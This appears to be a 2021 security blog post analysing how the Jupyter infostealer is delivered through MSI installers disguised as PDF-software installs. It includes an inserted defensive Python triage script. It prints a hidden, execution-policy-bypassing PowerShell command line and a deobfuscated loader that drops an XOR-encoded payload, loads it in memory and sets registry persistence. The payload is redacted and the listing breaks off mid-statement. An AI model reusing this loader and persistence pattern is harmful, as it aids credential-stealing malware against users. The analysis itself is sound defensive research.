# New Jupyter Evasive Delivery through MSI Installer

**[blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer](https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer)**

Posted by [Nadav Lorber on September 21, 2021](https://blog.morphisec.com/author/nadav-lorber). Find me on: [Twitter](https://twitter.com/LNadav)

[In 2020, Morphisec introduced the Jupyter infostealer](https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction), a .NET attack that primarily targets Chromium, Firefox, and Chrome browser data while also maintaining the additional capabilities of a backdoor. Since that time, Jupyter has remained active and highly evasive. It has continued to receive very low to zero detections in the VirusTotal database, maintaining the ability to bypass detection solutions.

Then, on 8 September 2021, we identified a new delivery chain within Jupyter that passes under the radar of security solutions. Following this discovery, the Morphisec Labs team has been made aware of multiple high-level targets that are under threat from the Jupyter infostealer. We are currently investigating the scope of the campaign.

The blog post that follows outlines the new delivery chain, showcasing how threat actors continue to develop their attacks to become more efficient and evasive.

_Editor's Note: This blog post has been updated as per the request of Advanced Installer._

## Technical Introduction

Figure 1: The attack flow of the new Jupyter infostealer

### The MSI Payload

In this section, we will briefly examine some of the payload's shared attributes in order to get an overview of what indicators to expect. This is based on the six variants that we have observed.

**Payload Size and Name**

Like previous Jupyter payloads, the size of the MSI payloads is consistently over 100 MB. This allows the payload to thwart online AV scanners.
The naming convention for the payload is:

- Potential document subjects
- Words are separated with a dash '-'
- Each word starts with a capital letter

Examples can be found in the IOCs section under the heading "MSI Payload Names."

**MSI Third-Party Installer Wizard**

The payloads were generated with a trial version of [Advanced Installer](https://www.advancedinstaller.com/) (version 18.6.1 build 2c9a75c6). As described on their website, the Advanced Installer wizard is an 'All-in-one' application packaging tool. By using this tool, threat actors gain easy access to obscured script execution. Customizing installer PowerShell operations is a legitimate functionality that the attackers misuse, as with other attack chains. This same operation is frequently used as part of legitimate products or services. We advise against flagging any PowerShell scripts originating from Advanced Installer without prior evaluation of the command itself. It is worth noting as well that PowerShell functionality is also available in other installers.

The attribution can be found either in the file properties (OLE Compound) or in the Installer Property table.

Figure 2: OLE Compound file information

Figure 3: Property table

**Decoy Installation Executable**

As seen in Figure 1 above, all of the observed variants are described as Nitro Pro 13. Once the victim runs the MSI payload, it executes a legitimate installation binary of Nitro Pro 13. Correlating this attribution with the variants' file names suggests that the delivery method disguises the payload as a PDF.

Figure 4: Nitro Pro 13 Installation

While all of the variants are described as Nitro, one of them actually contains SumatraPDF instead.
Figure 5: Sumatra PDF installation

**Digital Signature**

Two of the variants are signed with a (currently) valid certificate named 'TACHOPARTS SP Z O O'.

Figure 6: Tachoparts certificate

Based on the following certificate data, we can assume that the threat actor either impersonated the certificate or stole it from a legitimate business in Poland.

Figure 7: Tachoparts' business information from Google

Another variant was signed with a revoked certificate named 'OOO Sistema'.

Figure 8: OOO Sistema certificate

As with the previous certificate, this one is also correlated with a legitimate business. It was also likely either an impersonation or stolen from the business.

Figure 9: OOO Sistema business information from Google

The other two variants are signed with certificates named:

- FORMICA Solutions a.s.
- OOO Ruvents

### The PowerShell Execution

The initial suspicious indicator visible in the dynamic analysis is the PowerShell command line spawned by msiexec.exe.

**Command Line**

```
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile Noninteractive -ExecutionPolicy Bypass -File 'C:\Users\\AppData\Local\Temp\pssEA35.ps1' -propFile 'C:\Users\\AppData\Local\Temp\msiEA13.txt' -scriptFile 'C:\Users\\AppData\Local\Temp\scrEA14.ps1' -scriptArgsFile 'C:\Users\\AppData\Local\Temp\scrEA15.txt' -propSep ' :<->: ' -testPrefix '_testValue.'
```

Code block 1: CMD Shell command line

This command line is generated by a feature in Advanced Installer that executes the PowerShell loader as a 'CustomAction' defined in the MSI installer. The file names within the parameters differ between variants but keep the same pattern: for example, in 'scrEA14.ps1' the 'EA14' part is four hex characters, and these four characters differ between the payload variants.
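To illustrate the triage the post recommends (recognize the Advanced Installer custom-action pattern first, then evaluate the script it points at rather than flagging it outright), here is an added Python example. It is not part of the original post and is not Morphisec or Advanced Installer tooling. It assumes process telemetry that supplies the child's command line and the parent image path; the sample command line is constructed after Code block 1 with a placeholder username, and the switch names, file-name prefixes and four-hex-character stub pattern are taken from that block.

```python
import re
from typing import Dict, Optional

# Constructed sample modelled on Code block 1 (the post elides the username,
# so a placeholder 'user' is used here).
SAMPLE_CMDLINE = (
    r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive "
    r"-ExecutionPolicy Bypass -File 'C:\Users\user\AppData\Local\Temp\pssEA35.ps1' "
    r"-propFile 'C:\Users\user\AppData\Local\Temp\msiEA13.txt' "
    r"-scriptFile 'C:\Users\user\AppData\Local\Temp\scrEA14.ps1' "
    r"-scriptArgsFile 'C:\Users\user\AppData\Local\Temp\scrEA15.txt' "
    r"-propSep ' :<->: ' -testPrefix '_testValue.'"
)
# Constructed benign command line for comparison.
BENIGN_CMDLINE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Command Get-Process"

# Switches that the Advanced Installer PowerShell custom action passes to its
# wrapper script (all five appear in Code block 1).
AI_SWITCHES = {"propfile", "scriptfile", "scriptargsfile", "propsep", "testprefix"}

# pss####.ps1 / msi####.txt / scr####.ps1|txt dropped in %TEMP%, #### = four hex chars.
TEMP_STUB_RE = re.compile(r"\\Temp\\(pss|scr|msi)[0-9A-F]{4}\.(ps1|txt)$", re.IGNORECASE)

# -Switch followed by an optional value: 'single-quoted', "double-quoted" or bare token.
# A bare token may not start with '-' so the next switch is never swallowed as a value.
_ARG_RE = re.compile(r"-(\w+)(?:\s+(?:'([^']*)'|\"([^\"]*)\"|([^\s'\"-][^\s]*)))?")


def parse_powershell_args(cmdline: str) -> Dict[str, Optional[str]]:
    """Map each switch (lower-cased) to its value, or None for bare flags."""
    args: Dict[str, Optional[str]] = {}
    for m in _ARG_RE.finditer(cmdline):
        value = next((g for g in m.groups()[1:] if g is not None), None)
        args[m.group(1).lower()] = value
    return args


def triage_msiexec_child(cmdline: str, parent_image: str) -> dict:
    """Classify a PowerShell child process the way the post suggests.

    A hit on 'advanced_installer_custom_action' means: this is the legitimate
    installer feature, so do not block on the pattern alone; pull the file named
    in -scriptFile ('script_to_review') and evaluate its contents.
    """
    args = parse_powershell_args(cmdline)
    parent_is_msiexec = parent_image.lower().endswith("msiexec.exe")
    temp_stubs = [v for v in args.values() if v and TEMP_STUB_RE.search(v)]
    return {
        "advanced_installer_custom_action": AI_SWITCHES.issubset(args) and parent_is_msiexec,
        "execution_policy_bypass": (args.get("executionpolicy") or "").lower() == "bypass",
        "temp_stub_files": temp_stubs,
        "script_to_review": args.get("scriptfile"),
    }


if __name__ == "__main__":
    for label, cmd, parent in (
        ("sample", SAMPLE_CMDLINE, r"C:\Windows\System32\msiexec.exe"),
        ("benign", BENIGN_CMDLINE, r"C:\Windows\explorer.exe"),
    ):
        print(label, triage_msiexec_child(cmd, parent))
```

The result deliberately separates "this is an Advanced Installer custom action" from any verdict: the post's point is that the pattern alone is not malicious, so the field a responder acts on is `script_to_review`, the `-scriptFile` path whose contents carry the actual loader.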
Figure 9: PowerShell loader embedded in the CustomAction within Advanced Installer

Figure 10: PowerShell loader embedded in the CustomAction within Advanced Installer

### Jupyter PowerShell loader

The PowerShell file in the -scriptFile parameter presented in Code block 1 is the Jupyter PowerShell loader. This loader is very similar to the previous Jupyter loaders in that it remains a very evasive file with low to zero detections on VirusTotal, which is rare for a full PowerShell loader (loader code with an embedded payload). While the Jupyter loaders are widely covered in our and other blogs, the new variant shares the same code pattern. The following code block is a deobfuscated and beautified version of it:

```powershell
$b64_enc_payload = 'deducted';                      # embedded payload, base64 (redacted)
$random_path_str = 'jeiJBgXRTuVfsm';
$payload_directory_path = "$ENV:APPDATA\Microsoft\" + $random_path_str;
$enc_payload_path = $payload_directory_path + '\' + $random_path_str + '.' + $random_path_str;

# Drop the still-XOR-encoded payload to disk under %APPDATA%\Microsoft\<random>\<random>.<random>
[System.IO.File]::WriteAllBytes($enc_payload_path, [System.Convert]::FromBase64String($b64_enc_payload));

# The script below is carried as a string and later passed to "powershell -Command".
$decode_and_execute_payload_script = @'
$xor_key = "deducted base64 key";
$b64_enc_payload = [System.IO.File]::ReadAllBytes($enc_payload_path);
# Repeating-key XOR: walk the key one character at a time, restart it when exhausted
For ($i = 0; $i -lt $b64_enc_payload.Count;) {
    For ($y = 0; $y -lt $xor_key.Length; $y++) {
        $b64_enc_payload[$i] = $b64_enc_payload[$i] -bxor $xor_key[$y];
        $i++;
        if ($i -ge $b64_enc_payload.Count) { $y = $xor_key.Length }
    }
};
[System.Reflection.Assembly]::Load($b64_enc_payload);   # Loads 'interact' method
'@

# Persistence: registry run entries (registry paths redacted in the original)
Create_Registry_Key -reg_path ("") -execution_command ('Powershell -WindowStyle Hidden -ep Bypass -Command ' + $decode_and_execute_payload_script);
Create_Registry_Key -reg_path ("") -execution_command ($random_path_str.ToLower());

# The listing ends here, mid-statement, in the original post:
$lnk_object = (New-Object -ComObject WScript.Shell).CreateShortcut($ENV:APPDATA + '
```